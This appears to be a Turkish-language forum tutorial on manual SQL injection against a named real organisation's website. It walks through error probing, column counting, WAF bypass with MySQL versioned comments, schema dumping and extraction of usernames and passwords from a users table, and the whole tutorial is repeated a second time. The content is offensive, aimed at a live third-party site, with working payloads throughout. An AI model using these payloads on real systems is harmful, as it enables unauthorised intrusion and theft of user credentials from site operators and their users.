Merhaba arkadaşlar bu gün sizlere Manuel Sql injectıon-dan bahsedeceğim.
Öncelikle şunu belirtiğim ki "sqlmap ve ya havji" ıle sql acıklı site database,tablolarına erişim sagladıkta sıtede "WAF GÜVENLIK DUVARI" ile rastlanıyoruz.
Bu yüzden sızlere Manuel sql injectıonu bilmenızı tavsıye ederim.
Gerekenler : Mozilla firefox,hackbar
Hadı Başlayalım.
Hedef site -- Manav Vikas Seva Sangh : Gallery' (tek tirnak koyalim hatayi alalim )
You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near '\'' at line 1
Şimdi ise kolon sayısını bulmak için "order by" yapicağız:
Manav Vikas Seva Sangh : Gallery' order by 100-- - (yazip enter diyoruz)
arkadaşlar bazı sitelerde kolon sayını bulmak için id=6 order by 100-- - yapiyoruz bişeyler olmuyor yani "Unknown column '100' in 'order clause"
bu kelimeyi vermiyor bunun için id=6 değerinden sonra ' koyuyoruz. (bazi siteler "Unknown column '100' in 'order clause" yerine başka hatalar verir mesela resim kaybolmasi,sql hatasi ve s gibi.)
Şimdi hatayı aldık order by hangi rakamda hata vermemesini bulmamiz ıçin tek-tek inmemıze gerek yok bunun için:
Resimde gördüğünüz gibi "Order by 100" bu kelımeyı Mause ıle seçtim sonra resımde yukarıda Belırtmış olduğum "UNION BASED" tıklayıp "Column count" => "GROUP BY" seçiyoruz.
Böyle bi ekranla karşılaşacağız:
Enter diyoruz ve ;
"Unknown column '2' in 'group statement" -- Yani kolon sayisi 2 den küçük yanı "1"
Şimdi ıse ==> Manav Vikas Seva Sangh : Gallery union select 1-- -
diyoruz sıte hata verdı
Bypass yapalım
Manav Vikas Seva Sangh : Gallery /*!50000union*/ select 1-- -
site bize rakami verdi :
Manav Vikas Seva Sangh : Gallery /*!50000union*/ select 1-- - (1 rakamın yerınde Database() , versıon() yazıp database ve versıon bılgılerını ala bılırsınız)
sirada ise Tableleri almak var :
Manav Vikas Seva Sangh : Gallery /*!50000union*/ select 1-- - Burada 1 rakamini silip Hackbarda UNION BASED ==> DIOS MySQL ==> DIOS By Zen yapiyoruz. Yani
eveet tableleri verdi
bize gerekn tableler username,password,uname,pword,user_name ve s gibi tableler :
burada username ve password columnlarinin tb_users tablesinde olduğunu görüyoruz.
username ve password columnlarini çekmek için :
Manav Vikas Seva Sangh : Gallery /*!50000union*/ select concat(username,0x3a,password) from tb_users -- -
enter diyoruz Ve site Gine 403 Forbidden hatasi verdi . Bypass yapalim
Manav Vikas Seva Sangh : Gallery /*!50000union*/ select /*!50000concat*/(username,0x3a,password) from tb_users -- -
(bi tek "concat" ı bypass yapiyoruz )
bu kadar . selametle
Öncelikle şunu belirtiğim ki "sqlmap ve ya havji" ıle sql acıklı site database,tablolarına erişim sagladıkta sıtede "WAF GÜVENLIK DUVARI" ile rastlanıyoruz.
Bu yüzden sızlere Manuel sql injectıonu bilmenızı tavsıye ederim.
Gerekenler : Mozilla firefox,hackbar
Hadı Başlayalım.
Hedef site -- Manav Vikas Seva Sangh : Gallery' (tek tirnak koyalim hatayi alalim )
You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near '\'' at line 1
Şimdi ise kolon sayısını bulmak için "order by" yapicağız:
Manav Vikas Seva Sangh : Gallery' order by 100-- - (yazip enter diyoruz)
arkadaşlar bazı sitelerde kolon sayını bulmak için id=6 order by 100-- - yapiyoruz bişeyler olmuyor yani "Unknown column '100' in 'order clause"
bu kelimeyi vermiyor bunun için id=6 değerinden sonra ' koyuyoruz. (bazi siteler "Unknown column '100' in 'order clause" yerine başka hatalar verir mesela resim kaybolmasi,sql hatasi ve s gibi.)
Şimdi hatayı aldık order by hangi rakamda hata vermemesini bulmamiz ıçin tek-tek inmemıze gerek yok bunun için:
Resimde gördüğünüz gibi "Order by 100" bu kelımeyı Mause ıle seçtim sonra resımde yukarıda Belırtmış olduğum "UNION BASED" tıklayıp "Column count" => "GROUP BY" seçiyoruz.
Böyle bi ekranla karşılaşacağız:
Enter diyoruz ve ;
"Unknown column '2' in 'group statement" -- Yani kolon sayisi 2 den küçük yanı "1"
Şimdi ıse ==> Manav Vikas Seva Sangh : Gallery union select 1-- -
diyoruz sıte hata verdı
Bypass yapalım
Manav Vikas Seva Sangh : Gallery /*!50000union*/ select 1-- -
site bize rakami verdi :
Manav Vikas Seva Sangh : Gallery /*!50000union*/ select 1-- - (1 rakamın yerınde Database() , versıon() yazıp database ve versıon bılgılerını ala bılırsınız)
sirada ise Tableleri almak var :
Manav Vikas Seva Sangh : Gallery /*!50000union*/ select 1-- - Burada 1 rakamini silip Hackbarda UNION BASED ==> DIOS MySQL ==> DIOS By Zen yapiyoruz. Yani
eveet tableleri verdi
bize gerekn tableler username,password,uname,pword,user_name ve s gibi tableler :
burada username ve password columnlarinin tb_users tablesinde olduğunu görüyoruz.
username ve password columnlarini çekmek için :
Manav Vikas Seva Sangh : Gallery /*!50000union*/ select concat(username,0x3a,password) from tb_users -- -
enter diyoruz Ve site Gine 403 Forbidden hatasi verdi . Bypass yapalim
Manav Vikas Seva Sangh : Gallery /*!50000union*/ select /*!50000concat*/(username,0x3a,password) from tb_users -- -
(bi tek "concat" ı bypass yapiyoruz )
bu kadar . selametle
